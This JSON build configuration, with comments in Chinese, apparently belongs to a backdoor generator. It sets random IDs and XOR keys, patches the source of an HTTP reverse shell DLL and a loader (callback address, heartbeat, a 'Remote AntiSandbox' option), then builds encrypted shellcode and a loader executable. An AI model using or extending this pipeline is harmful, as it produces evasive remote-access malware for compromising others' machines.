[{
	"Explain" : "定义三个随机数变量 (后门文件 ID、ShellCode 异或密钥)；变量名 : 随机数范围",
	"Action" : "SetRand",
	"SetRand" : {
		"fid" : "9999",
		"xor1" : "255",
		"xor2" : "255"
	}
},
{
	"Explain" : "对 ShellCode 源码进行字符串替换；<fid> 对应变量 fid",
	"Action" : "Replace",
	"Project" : "HttpReverseShell",
	"Replace" : {
		"dllmain.cpp" : {
			"127.0.0.1:1234" : "127.0.0.1:1234",
			"[FID]" : "<fid>",
			"iniHeartbeat = 1.5" : "iniHeartbeat = 1.5",
			"heartbeatDevMax = 0.5" : "heartbeatDevMax = 0.5"
		}
	}
},
{
	"Explain" : "对 ShellCode Loader 源码进行字符串替换；<xor1>、<xor2> 同理",
	"Action" : "Replace",
	"Project" : "HttpReverseLoader",
	"Replace" : {
		"HttpReverseLoader.cpp" : {
			"127.0.0.1" : "127.0.0.1",
			"1234" : "1234",
			"Remote AntiSandbox" : "Remote AntiSandbox",
			"iniHeartbeat = 1.5" : "iniHeartbeat = 1.5",
			"heartbeatDevMax = 0.5" : "heartbeatDevMax = 0.5",
			"xor1 = 0xFF" : "xor1 = <xor1>",
			"xor2 = 0xFF" : "xor2 = <xor2>"
		}
	}
},
{
	"Explain" : "生成 ShellCode，并使用 xor1、xor2 加密；之后还原源码",
	"Action" : "GenerateShellCode",
	"GenerateShellCode" : {
		"HttpReverseShell" : {
			"Product" : "HttpReverseShell.dll",
			"Restore" : ["dllmain.cpp"]
		}
	}
},
{
	"Explain" : "写入 ShellCode 生成 Loader；之后还原源码",
	"Action" : "GenerateLoader",
	"GenerateLoader" : {
		"HttpReverseLoader" : {
			"ShellCodePath" : "ShellCode\\shell.bin",
			"Product" : "HttpReverseLoader.exe",
			"Restore" : ["HttpReverseLoader.cpp"]
		}
	}
}]